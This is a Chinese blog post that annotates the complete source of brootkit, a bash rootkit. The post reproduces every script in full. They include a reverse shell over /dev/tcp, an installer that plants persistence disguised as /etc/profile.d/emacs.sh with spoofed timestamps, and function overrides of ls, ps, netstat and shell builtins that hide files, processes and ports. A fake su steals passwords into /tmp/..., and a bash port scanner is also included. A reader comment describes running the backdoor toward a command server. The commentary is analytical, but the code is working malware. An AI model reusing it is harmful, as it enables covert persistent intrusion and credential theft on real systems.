brootkit: 一个shell脚本写的后门

发布时间:June 7, 2015 // 分类:工作日志,运维工作,linux,代码学习,转帖文章 // 1 Comment

今晚在吃饭呢, XX给我发来一条消息, 让我看看brootkit, 看看这个东西的兼容性怎样. 然后我把每个文件观察了一下, 发现它最核心的功能就是一个反弹shell, 利用了bash的可以创建tcp连接的特性. 其它的脚本除了brootkit.sh之外, 基本就是为了更加适合小白去使用而写的, 不过brootkit.sh的主要功能就是根据rootkit的配置文件隐藏这一整套的脚本和配置文件. 兼容性不怎样, 因为很可能没有bash这个程序.

打开连接看了一下描述, 是这样的, 它是一个bash脚本写的rootkit工具.

它可以做这些事情

more hidable ability against admintrator or hids.
su passwd thief.
hide file and directorys.
hide process.
hide network connections.
connect backdoor.
muilt thread port scanner.
http download.
好吧, 先checkout出来

MacOS:tmp cc$ svn co https://github.com/cloudsec/brootkit
A    brootkit/branches
A    brootkit/trunk
A    brootkit/trunk/.bdrc
A    brootkit/trunk/README
A    brootkit/trunk/README.md
A    brootkit/trunk/bashbd.sh
A    brootkit/trunk/br.conf
A    brootkit/trunk/br_config.sh
A    brootkit/trunk/brdaemon.sh
A    brootkit/trunk/brget.sh
A    brootkit/trunk/brootkit.sh
A    brootkit/trunk/brscan.sh
A    brootkit/trunk/install.sh
A    brootkit/trunk/uninstall.sh
Checked out revision 35.
MacOS:tmp cc$

可以看到, 有一个配置文件, 还有8个sh脚本, 根据README的描述, 应该是bash脚本

一个个脚本来看, 首先看bashbd.sh, 我给加上注释了

#!/bin/bash

BR_ROOTKIT_PATH="/usr/include/..."

. $BR_ROOTKIT_PATH/br_config.sh

function br_connect_backdoor()
{
    local target_ip=$br_remote_host
    local target_port=$br_remote_port
    local sleep_time=$br_sleep_time

    while [ 1 ]
    do  
        MAX_ROW_NUM=`stty size|cut -d " " -f 1`
        MAX_COL_NUM=`stty size|cut -d " " -f 2`
        {
        PS1='[\A j\j \u@\h:t\l \w]\$';export PS1
        exec 9<> /dev/tcp/$target_ip/$target_port # 这一步需要bash支持, 就是把9号文件描述符打开并重定向到某个ip的某个端口.
        [ $? -ne 0 ] && exit 0 || exec 0<&9;exec 1>&9 2>&1 # 检查文件描述符是否打开成功, 如果失败则退出, 否则把当前shell的标准输入和标准输出以及出错重定向到文件描述符
        if type python >/dev/null;then # 如果有python则用python去调用bash获取反弹shell
            export MAX_ROW_NUM MAX_COL_NUM
            python -c 'import pty; pty.spawn("/bin/bash")'
        else
            /bin/bash --rcfile $BR_ROOTKIT_PATH/.bdrc --noprofile -i # 如果没有python就执行bash, 其实这里是执行任意shell都可以的
        fi
        }&
        wait

        sleep $((RANDOM%sleep_time+sleep_time))
    done
}

br_load_config $BR_ROOTKIT_PATH/br.conf
br_connect_backdoor

从man手册可以知道那个rcfile选项的意思是这样的

--rcfile file
Execute commands from file instead of the standard personal initialization file ~/.bashrc if the shell is interactive (see INVOCATION below).

而那个.bdrc文件只是打印一个欢迎字符串而已

#!/bin/bash

echo -e "\033[31m\t\t\t\twelcome to brootkit\033[0m\033[32m"

br.conf里面定义了一些需要隐藏的文件和进程, 还有反弹shell的目标ip和端口

#brootkit config file.
#
HIDE_PORT       8080,8899
HIDE_FILE       br.conf,bashbd.sh,brootkit,.bdrc,brdaemon
HIDE_PROC       bashbd,brootkit,pty.spawn,brdaemon
REMOTE_HOST     localhost
REMOTE_PORT     8080
SLEEP_TIME      60

看一下br_config.sh, 它定义了3个函数, 以及许多数组变量, 用来载入和显示配置文件的参数的

#!/bin/bash

declare -a br_hide_port
declare -a br_hide_file
declare -a br_hide_proc
declare -a br_remote_host
declare -a br_remote_port
declare br_sleep_time

function br_load_config()
{
        local arg1 arg2 line

        while read line
        do
                [ "${line:0:1}" == "#" -a -z "$line" ] && continue

                arg1=`echo $line | cut -d " " -f 1`
                arg2=`echo $line | cut -d " " -f 2`

                case $arg1 in
                        "HIDE_PORT")
                                br_hide_port=$arg2;;
                        "HIDE_FILE")
                                br_hide_file=$arg2;;
                        "HIDE_PROC")
                                br_hide_proc=$arg2;;
                        "REMOTE_HOST")
                                br_remote_host=$arg2;;
                        "REMOTE_PORT")
                                br_remote_port=$arg2;;
                        "SLEEP_TIME")
                                br_sleep_time=$arg2;;
                esac
        done < $1
}

function display_array()
{
    declare -a arg_tmp=$1
    local arg old_ifs

    old_ifs=$IFS; IFS=","
    for arg in ${arg_tmp[@]}
    do
        echo $arg
    done
    IFS=$old_ifs
}

function br_display_config()
{
        echo -e "HIDE_PORT:"
    display_array $br_hide_port
        echo -e "HIDE_FILE:"
    display_array $br_hide_file
        echo -e "HIDE_PROC:"
    display_array $br_hide_proc
        echo -e "REMOTE_HOST:"
    display_array $br_remote_host
        echo -e "REMOTE_PORT:"
    display_array $br_remote_port
        echo -e "SLEEP_TIME:"
    echo $br_sleep_time
}

根据man手册, declare -a的意思是声明一个数组

An array is created automatically if any variable is assigned to using
the syntax name[subscript]=value. The subscript is treated as an
arithmetic expression that must evaluate to a number greater than or
equal to zero. To explicitly declare an array, use declare -a name
(see SHELL BUILTIN COMMANDS below). declare -a name[subscript] is also
accepted; the subscript is ignored. Attributes may be specified for an
array variable using the declare and readonly builtins. Each attribute
applies to all members of an array.

这是brget.sh的内容, 用bash些的一个发送get请求的脚本, 用到了bash的特性, 就是发起tcp连接并且打开文件描述符连接到这个tcp连接

#!/bin/bash

declare remote_host
declare remote_port
declare remote_file
declare remote_file_len

function sock_read()
{
    local line tmp

    read -u 9 -t 5 line
    if ! echo $line|grep -e "200 OK" >/dev/null; then
        echo $line
        rm -f $remote_file
        socket_close
        exit
    else
        echo "response 200 ok."
    fi

    while read -u 9 -t 5 line
    do
        if [ ${#line} -eq 1 ]; then
            break
        fi

        tmp=`echo $line|cut -d " " -f 1`
        if [ "$tmp" == "Content-Length:" ]; then
            remote_file_len=`echo $line|cut -d " " -f 2`
        fi
    done

    echo "length: $remote_file_len"
    while read -u 9 -t 5 line
    do
        echo -e "$line" >>$remote_file
    done
}

function sock_write()
{
    local buf

    buf="GET /$3 http/1.0\r\nHost: $1:$2\r\n"
    echo -e $buf >&9
    [ $? -eq 0 ] && echo "send http request ok." || echo "send http request failed."
}

function socket_create()
{
    exec 9<> /dev/tcp/$1/$2
    [ $? -eq 0 ] && echo "connect to $1:$2 ok." || echo "connect to $1:$2 failed."
}

function socket_close()
{
    exec >&9-
    [ $? -ne 0 ] && echo "close socket failed."
}

function parse_url()
{
    local url=$1

    url=${url#http://}
    remote_file=${url#*/}
    remote_host=`echo $url | awk -F '/' '{print $1}'`
    remote_port=`echo $remote_host | awk -F ':' '{print $2}'`
    remote_host=`echo $remote_host | awk -F ':' '{print $1}'`

    [ "$remote_port" == "" ] && remote_port=80
}

function file_init()
{
    [ -f $remote_file ] && rm -f $remote_file || touch $remote_file
}

function display_start()
{
    local tmp

    tmp=`date +'%F %T'` 
    tmp="--$tmp-- $1"
    echo -e $tmp
}

function display_finsh()
{
    local tmp

    tmp=`date +'%F %T'` 
    tmp="\n--$tmp-- - $remote_file saved $remote_file_len"
    echo -e "$tmp"
}

function wget_usage()
{
    echo -e "$0 <url>\n"
    echo "exp:"
    echo "$0 http://www.baidu.com/index.html"
    echo "$0 http://www.baidu.com:80/index.html"
}

function main()
{
    if [ $# -eq 0 ]; then
        wget_usage $1
        exit
    fi

    parse_url $@

    file_init
    display_start $1
    socket_create $remote_host $remote_port
    sock_write $remote_host $remote_port $remote_file
    sock_read
    display_finsh
    socket_close
}

main $@

用起来就像这样

MacOS:trunk cc$ bash brget.sh http://g.cn
--2015-01-20 22:33:20-- http://g.cn
connect to g.cn:80 ok.
send http request ok.
HTTP/1.0 400 Bad Request
MacOS:trunk cc$

brscan.sh, 看名字就知道了, 是一个端口扫描的东西, 看代码, 也用到了bash的发起tcp连接的特性

#!/bin/bash

declare br_remote_host="localhost"
declare -a br_ports
declare -a br_open_ports
declare br_port_num=0
declare br_curr_port_num=0
declare br_open_port_num=0
declare br_thread_num=0
declare br_timeout=2
declare br_logfile="brscan.log"
declare total_run_time
declare max_row_num

declare -a playx=('/' '|' '\\' '-')
declare playx_len=4

declare max_col_num=64
declare base_row=0
declare base_col=1
declare cur_col=2
declare total_port=10
declare cur_port=0

function br_run_play()
{
        local i x y tmp_col

        tmp_col=$((br_curr_port_num * max_col_num / br_port_num))

        i=$((max_row_num+1))
        [ $br_thread_num -gt $i ] && x=$i || x=$((br_thread_num+4))

        for ((i = 1; i < $tmp_col; i++))
        do
                y=$((base_col+i))
                [ $y -gt $max_col_num ] && break
                echo -ne "\033[${x};${y}H>\033[?25l"
        done
}

function br_play_init()
{
        local x y i

        i=$((max_row_num+1))
        [ $br_thread_num -gt $i ] && x=$i || x=$((br_thread_num+4))

        echo -ne "\033[${x};${base_col}H\033[33m[\033[0m"

        y=$((max_col_num+1))
        echo -ne "\033[${x};${y}H\033[33m]\033[0m"
}

function compute_run_time()
{
        local day hour min rtime

        day=$(($1/3600/24))
        hour=$(($1/3600))
        min=$(($1/60))

        if [ $min -eq 0 ]; then
                sec=$(($1%60))
        total_run_time="$sec s"
        else
                if [ $hour -eq 0 ]; then
                        sec=$(($1%60))
                        total_run_time="$min m $sec s"
                else
                        if [ $day -eq 0 ]; then
                                tmp=$(($1%3600))
                                min=$(($tmp/60))
                                sec=$(($tmp%60))
                                total_run_time="$hour h $min m $sec s"
                        else
                                # 86400 = 3600 * 24
                                tmp=$(($1%86400))
                                hour=$(($tmp/3600))
                                tmp1=$(($tmp%3600))
                                min=$(($tmp1/60))
                                sec=$(($tmp1%60))
                                total_run_time="$day d $hour h $min m $sec s"
                        fi


                fi
        fi
}

function get_run_time()
{
        local run_count local_hz run_time
    local start_time curr_time

    if [ -d "/proc/$1" ]; then
            run_count=`cat /proc/$1/stat | cut -d " " -f 22`
    else
        return 0
    fi

        local_hz=`getconf CLK_TCK`
        start_time=$(($run_count/$local_hz))

        curr_time=`cat /proc/uptime | cut -d " " -f 1 | cut -d "." -f 1`
        run_time=$((curr_time-start_time))

    return $run_time
}

function br_show_open_ports()
{
    local x y i

    get_run_time $$
    run_time=$?

    compute_run_time $run_time

    i=$((max_row_num+1))
    [ $br_thread_num -gt $i ] && x=$i || x=$((br_thread_num+4))

    y=$((max_col_num+3))
    printf "\033[${x};${y}H\033[32;1m %5d/%-5d\t$total_run_time\033[0m" \
        $br_curr_port_num $br_port_num

    x=$((x+2)); y=1
    printf "\033[${x};${y}H\033[32;1m%s: ${br_open_ports[*]}\033[0m" \
        $br_remote_host 
}

# $1 => remote host
# $2 => remote port
# $3 => thread_num
function thread_scan()
{
    local tport pid pidfile sock_fd
    local i j k m=0 run_time x

    mkdir -p .scan

    for ((i = 0; i < $3; i++))
    do
        {
        let "sock_fd=$2+$i"
        let "j=$2+$i+3"
        /bin/bash -c "exec $j<> /dev/tcp/$1/${br_ports[$sock_fd]}" 2>${br_ports[$sock_fd]}
        }&
        let "k=$2+$i"
        x=$((m+3))
        if [ $x -ge $max_row_num ]; then
             m=0;x=3
        else
            ((m++))
        fi
        printf "\033[${x};1H\033[33mthread<%-5d>\t\t--\t\tpid <%-5d>\t-->\t%-5d\033[?25l" \
            $i $! ${br_ports[$k]}
        echo ${br_ports[$k]} > ".scan/$!"
        [ $br_curr_port_num -ge $br_port_num ] && break || ((br_curr_port_num++))
    done

    sleep $br_timeout

    exec 2>&-
        for pid in `jobs -p`
        do
        get_run_time $pid
        run_time=$?
        [ $run_time -eq 0 ] && continue

                if [ $run_time -ge $br_timeout ]; then
                        kill -9 $pid >/dev/null 2>&1
            rm -f ".scan/$pid"
                fi
        done

    for ((i = 0; i < $3; i++))
    do
        let "sock_fd=$2+$i"
                if [ ! -s ${br_ports[$sock_fd]} ]; then
            for pid_file in `ls .scan`
            do
                tport=`cat ".scan/$pid_file"`
                if [ $tport -eq ${br_ports[$sock_fd]} ]; then
                    br_open_ports[$br_open_port_num]=${br_ports[$sock_fd]}
                    ((br_open_port_num++))
                fi
            done
                fi

        rm -f ${br_ports[$sock_fd]}
    done

    br_run_play
    br_show_open_ports
    rm -fr .scan
}

# $1 => remote host
# $2 => thread_num
function br_scan_port()
{
    local i

    for ((i = 0; i < $br_port_num; i+=$br_thread_num))
    do
        thread_scan $br_remote_host $i $br_thread_num
    done
}

function br_show_ports()
{
    local i

    for ((i = 0; i < $br_port_num; i++))
    do
        echo ${br_ports[$i]}
    done
}

function parse_port()
{
    local start_port end_port port

    start_port=`echo $1 | cut -d "-" -f 1`
    end_port=`echo $1 | cut -d "-" -f 2`

    for ((port=$start_port; port <= $end_port; port++))
    do
        br_ports[$br_port_num]=$port
        ((br_port_num++))
    done
    ((br_port_num--))
}

function br_parse_port()
{
    declare -a ports
    local tmp_ifs port

    tmp_ifs=$IFS; IFS=','; ports=$1

    for port in ${ports[@]}
    do
        if echo $port|grep -e ".*-.*" >/dev/null; then
            parse_port $port
        else
            br_ports[$br_port_num]=$port
            ((br_port_num++))
        fi
    done
    IFS=$tmp_ifs
}

function br_show_arg()
{
    echo -ne "\033[1;1H"
    echo -ne "\033[31;1mhost: $br_remote_host | total ports: $br_port_num | thread num: $br_thread_num "
    echo -e "timeout: $br_timeout | logfile: $br_logfile\n\033[0m"
}

function br_scan_init()
{
    echo -ne "\033[2J"
        MAX_ROW_NUM=`stty size|cut -d " " -f 1`
        MAX_COL_NUM=`stty size|cut -d " " -f 2`
    max_row_num=$((MAX_ROW_NUM-5))
}

function br_scan_exit()
{
    echo -e "\033[?25h"
}

function br_usage()
{
    echo -e "$1 <-p> [-n|-t|-o|-h] <remote_host>\n"
    echo -e "option:"
    echo -e "-p\t\tports, pattern: port1,port2,port3-port7,portn..."
    echo -e "-n\t\tthread num, defalut is 10"
    echo -e "-t\t\ttimeout, default is 30s"
    echo -e "-o\t\tresults write into log file, default is brscan.log"
    echo -e "-h\t\thelp information."
    echo -e "\nexp:"
    echo -e "$1 -p 21,22,23-25,80,135-139,8080 -t 20 www.cloud-sec.org"
    echo -e "$1 -p 1-65525 -n 200 -t 20 www.cloud-sec.org"
}

function main()
{
    if [ $# -eq 0 ]; then
        br_usage $0
        exit 0
    fi

    while getopts "p:n:t:o:h" arg
    do
    case $arg in
        p)
            br_parse_port $OPTARG ;;
        n)
            br_thread_num=$OPTARG ;;
        t)
            br_timeout=$OPTARG ;;
        o)
            br_logfile=$OPTARG ;;
        h)
            br_usage $0
            exit 0
            ;;
        ?)
            echo "unkown arguments."
            exit 1
            ;;
        esac
    done

    shift $((OPTIND-1))
    br_remote_host=$@

    [ $br_port_num -lt $br_thread_num ] && br_thread_num=$br_port_num

    #br_show_ports
    br_scan_init
    br_play_init
    br_show_arg
    br_scan_port
    br_scan_exit
}

main $@

brdaemon.sh是一个把bashbd.sh放后台执行的一个脚本

#!/bin/bash

BR_ROOTKIT_PATH="/usr/include/..."

function br_hookhup()
{
        :
}

function br_daemon()
{
    if ! type nohup >/dev/null; then
                nohup $BR_ROOTKIT_PATH/bashbd.sh > /dev/null 2>&1
                [ $? -eq 1 ] && exit
        else
                trap br_hookhup SIGHUP
                $BR_ROOTKIT_PATH/bashbd.sh > /dev/null 2>&1 &
                [ $? -eq 1 ] && exit
        fi
}

br_daemon

install.sh脚本就是

#!/bin/bash

BR_ROOTKIT_PATH="/usr/include/..."

function br_rootkit()
{
    cp brootkit.sh /etc/profile.d/emacs.sh # 把rootkit脚本拷贝到指定目录, 每次打开一个登录shell的时候都会执行这个脚本
    touch -r /etc/profile.d/vim.sh /etc/profile.d/emacs.sh # 用vim.sh的时间戳来修饰emacs.sh
}

function br_hookhup()
{
    :
}

function main()
{
    mkdir -p $BR_ROOTKIT_PATH -m 0777 # 创建文件夹来存放所有文件
    [ $? -eq 1 ] && exit && echo "mkdir $BR_ROOTKIT_PATH failed."

    cp brootkit.sh br.conf br_config.sh bashbd.sh brscan.sh $BR_ROOTKIT_PATH
    [ $? -eq 1 ] && exit && echo "copy brootkit failed."

    cp brdaemon.sh /etc/rc.d/init.d/brdaemon # 复制控制脚本到系统存放控制脚本的目录
    ln -s /etc/rc.d/init.d/brdaemon /etc/rc.d/rc3.d/S10brdaemon # 在运行级别3的话就启动脚本, 适用Red Hat系列Linux
    [ $? -eq 1 ] && exit && echo "copy brdaemon failed."

    chmod 777 $BR_ROOTKIT_PATH

    if ! type nohup >/dev/null; then
        nohup $BR_ROOTKIT_PATH/bashbd.sh > /dev/null 2>&1
        [ $? -eq 1 ] && exit && echo "install backdoor failed."
    else
        trap br_hookhup SIGHUP
        $BR_ROOTKIT_PATH/bashbd.sh > /dev/null 2>&1 &
        [ $? -eq 1 ] && exit && echo "install backdoor failed."
    fi

    br_rootkit
    [ $? -eq 1 ] && exit && echo "install brootkit failed." || \
        echo "install brootkit successful."
}

main

根据man手册, touch -r的意思如下

-r Use the access and modifications times from the specified file instead of the current time of day.
好了, 到了最后一个脚本, 这个脚本的主要功能就是, 每次用户登录的时候就执行, 它会替换系统命令, 根据配置文件把相关的文件给隐藏掉, 就是这样

#!/bin/bash
# Lightweight rootkit implemented by bash shell scripts v0.01
#
# by wzt 2015   http://www.cloud-sec.org
#

declare -r builtin
declare -r declare
declare -r set
declare -r fake_unset
declare -r type
declare -r typeset

unalias ls >/dev/null 2>&1

BR_ROOTKIT_PATH="/usr/include/..."

function abcdmagic()
{
    :
}

function builtin()
{
    local fake_a fake_b

    unset command
    case $1 in 
        "declare"|"set"|"unset"|"command"|"type"|"typeset")
            fake_a="$(command builtin $1 $2)"
            if [ $2 == " " ];then
                fake_b=${fake_a/br_hide_file\=*/}
            else
                fake_b=${fake_a/\/bin\/ls?()*/}
            fi
            echo -n "$fake_b"
            reset_command
            return ;;
        "builtin")
            echo "bash: builtin: builtin: syntax error, bash($BASH_VERSION) is not support."
            reset_command
            return ;;
        *)
            command builtin $1 $2
            reset_command
            ;;
    esac
}

function declare()
{
    local fake_a fake_b

    unset command
    case $1 in 
        "")
            fake_a="$(command declare $1 $2)"
            fake_b=${fake_a/br_hide_file\=*/}
            echo -n "$fake_b"
            reset_command
            return ;;
        "-f"|"-F")
            fake_a="$(command declare $1 $2)"
            fake_b=${fake_a/\/bin\/ls?()*/}
            echo -n "$fake_b"
            reset_command
            return ;;
        *)
            command declare $1 $2
            reset_command
            return ;;
    esac
}

function typeset()
{
    local fake_a fake_b

    unset command
    case $1 in
        ""|"-f"|"-F")
            fake_a="$(command declare $1 $2)"
            fake_b=${fake_a/br_hide_file\=*/}
            echo -n "$fake_b"
            reset_command
            return ;;
        *)
            command typeset $1 $2
            reset_command
            return ;;
    esac
}

function type()
{
    case $1 in
        "builtin"|"declare"|"set"|"unset"|"type"|"typeset")
            echo "$1 is a shell builtin"
            return ;;
        "dir")
            echo "dir is /usr/bin/dir"
            return ;;
        "ls")
            echo "ls is aliased to ls --color=tty"
            return ;;
        "ps")
            echo "ps is /bin/ps"
            return ;;
        "netstat")
            echo "netstat is hashed (/bin/netstat)"
            return ;;
        "/bin/ls"|"/usr/bin/dir"|"/bin/ps"|"/bin/netstat")
            echo "$1 is $1"
            return ;;
        *)
            unset command
            command type $1 $2
            reset_command
            return ;;
    esac
}

function set()
{
    local fake_a fake_b

    unset command
    case $1 in
        "")
            fake_a="$(command set)"
            fake_b=${fake_a/br_hide_file\=*/}
            echo -n "$fake_b"
            reset_command
            return ;;
        "-x"|"+x")
            return ;;
        *)
            echo $1 $2
            command set $1 $2
            reset_command
            return ;;
    esac
}

function fake_unset()
{
    case $1 in
        "builtin"|"declare"|"command"|"set"|"unset"|"type"|"typeset")
            echo "bash: syntax error, bash($BASH_VERSION) is not support."
            return ;;
        *)
            unset $1 $2
            return ;;
    esac
}

function fake_command()
{
    case $1 in
        "builtin"|"declare"|"command"|"set"|"unset"|"type"|"typeset")
            echo "bash: syntax error, bash($BASH_VERSION) is not support."
            return ;;
        *)
            unset command
            command $1 $2
            reset_command
            return ;;
    esac
}

function command()
{
    case $1 in
        "builtin")
            builtin $2 $3
            return ;;
        "declare")
            declare $2 $3
            return ;;
        "set")
            set $2 $3
            return ;;
        "unset")
            fake_unset $2 $3
            . brootkit.sh
            return ;;
        "type")
            type $2 $3
            return ;;
        "typeset")
            typeset $2 $3
            return ;;
        "command")
            fake_command $2 $3
            return ;;
        *)
            unset command
            command $2 $3
            . brootkit.sh
            return ;;
    esac
}

function reset_command()
{
    function command()
    {
        case $1 in
            "builtin")
                builtin $2 $3
                return ;;
            "declare")
                declare $2 $3
                return ;;
            "set")
                set $2 $3
                return ;;
            "unset")
                fake_unset $2 $3
                . brootkit.sh
                return ;;
            "type")
                type $2 $3
                return ;;
            "typeset")
                typeset $2 $3
                return ;;
            "command")
                fake_command $2 $3
                return ;;
            *)
                unset command
                command $2 $3
                . brootkit.sh
                return ;;
        esac
    }
}

function su()
{
    local arg_list=("" "-" "-l" "--login"
            "-c" "--command" "--session-command"
            "-f" "--fast"
            "-m" "--preserve-environment" "-p"
            "-s" "--shell=SHELL")
    local flag=0 tmp_arg arg pass

    if [ $UID -eq 0 ]; then
        /bin/su $1; unset su ; return $?
    fi

    for arg in ${arg_list[@]}
    do
        [ "$1" = "$arg" ] && flag=1
    done

    [ $# -eq 0 ] && flag=1

    tmp_arg=$1;tmp_arg=${tmp_arg:0:1};
    [ "$tmp_arg" != "-" -a $flag -eq 0 ] && flag=1

    if [ $flag -ne 1 ];then
        /bin/su $1; return $?
    fi

    [ ! -f /tmp/... ] && `touch /tmp/... && chmod 777 /tmp/... >/dev/null 2>&1`

    echo -ne "Password:\r\033[?25l"
    read -t 30 -s pass
    echo -ne "\033[K\033[?25h"

    /bin/su && unset su && echo $pass >> /tmp/...
}

unalias ls >/dev/null 2>&1

function max_file_length()
{
    local tmp_file sum=0 n=0

    for tmp_file in `/bin/ls $@`
    do
        n=${#tmp_file}
        [ $n -gt $sum ] && sum=$n
    done

    return $sum
}

function ls()
{
    local fake_file max_col_num file_format
    local hide_file hide_flag file_arg old_ifs
    local file_len=0 sum=0 n=0 display_mode=0

    max_col_num=`stty size|cut -d " " -f 2`

    . $BR_ROOTKIT_PATH/br_config.sh
    br_load_config $BR_ROOTKIT_PATH/br.conf

    for file_arg in $@
    do
        if echo $file_arg|grep -q -e "^-.*l.*"; then
            display_mode=1; break
        fi
    done

    case $display_mode in
    0)
        unset -f /bin/ls
        max_file_length $@
        file_len=$?

        for fake_file in $(/bin/ls $@)
        do
            hide_flag=0
            old_ifs=$IFS; IFS=","
            for hide_file in ${br_hide_file[@]}
            do
                if echo "$fake_file"|grep -e "^$hide_file" >/dev/null;then
                    hide_flag=1; break
                fi
            done
                IFS=$old_ifs

            [ $hide_flag -eq  1 ] && continue

            n=${#fake_file}
            ((sum=sum+n+file_len))

            if [ $sum -gt $max_col_num ];then
                file_format="%-$file_len""s\n"
                printf $file_format $fake_file
                sum=0
            else
                file_format="%-$file_len""s "
                printf $file_format $fake_file
            fi
        done

        [ $sum -le $max_col_num ] && echo ""
        reset_ls
        return ;;
    1)  
        unset -f /bin/ls

        fake_file=`/bin/ls $@`
        old_ifs=$IFS; IFS=","
        for hide_file in ${br_hide_file[@]}
        do
            fake_file=`echo "$fake_file" | sed -e '/'$hide_file'/d'`
        done
        IFS=$old_ifs
        echo "$fake_file"
        reset_ls

        return ;;
    esac
}

function dir()
{
    ls $@
}

function /usr/bin/dir()
{
    unset -f /bin/ls
    ls $@
    reset_ls
}

function reset_ls()
{
    function /bin/ls()
    {
        unset -f /bin/ls
        ls $@
        reset_ls
    }
}

function /bin/ls()
{
    unset -f /bin/ls
    ls $@
    reset_ls
}

function ps()
{
    local proc_name hide_proc old_ifs

    . $BR_ROOTKIT_PATH/br_config.sh
    br_load_config $BR_ROOTKIT_PATH/br.conf

    old_ifs=$IFS; IFS=","

    proc_name=`/bin/ps $@`
    for hide_proc in ${br_hide_proc[@]}
    do
        proc_name=`echo "$proc_name" | sed -e '/'$hide_proc'/d'`
    done

    echo "$proc_name"
    IFS=$old_ifs
}

function reset_ps()
{
    function /bin/ps()
    {
        unset -f /bin/ps
        ps $@
        reset_ps
    }
}

function /bin/ps()
{
    unset -f /bin/ps
    ps $@
    reset_ps
}

function netstat()
{
    local hide_port tmp_port old_ifs

    . $BR_ROOTKIT_PATH/br_config.sh
    br_load_config $BR_ROOTKIT_PATH/br.conf

    old_ifs=$IFS; IFS=","
    tmp_port=`/bin/netstat $@`
    for hide_port in ${br_hide_port[@]}
    do
        tmp_port=`echo "$tmp_port" | sed -e '/'$hide_port'/d'`
    done
    echo "$tmp_port"
    IFS=$old_ifs
}

function reset_netstat()
{
    function /bin/netstat()
    {
        unset -f /bin/netstat
        netstat $@
        reset_netstat
    }
}

function /bin/netstat()
{
    unset -f /bin/netstat
    netstat $@
    reset_netstat
}

 

标签:brootkit

仅有一条 关于 " brootkit: 一个shell脚本写的后门 "的评论.

  1. 苏

    我修改了br.conf 中的host 和 port 为11111 然后
    我在CC服务器上运行了 nc -l 11111

    在测试内网机器上运行了:
    ./bashbd.sh
    提示
    ./bashbd.sh: connect: No route to host
    ./bashbd.sh: line 26: /dev/tcp/45.32.xx.xx/11111: No route to host
    ./bashbd.sh: line 37: RANDOM%sleep_time+sleep_time: division by 0 (error token is "+sleep_time")

    为什么出现这个问题 提示no route to host

添加新评论 »

分类
最新文章
最近回复
  • 没穿底裤: 最近发现的新版本可以装在LINUX了。但是API有点变化
  • 没穿底裤: 暂时好像没有看到这个功能.
  • 没穿底裤: 这个只是一个分析,并不是使用方法哟
  • 没穿底裤: 抱歉,很久没有打理了。会不会你使用的是12版本。目前还没有遇到过这种情况
  • bao song: http://0cx.cc/php_decode_shell.jspx 这个怎么用,代码提示...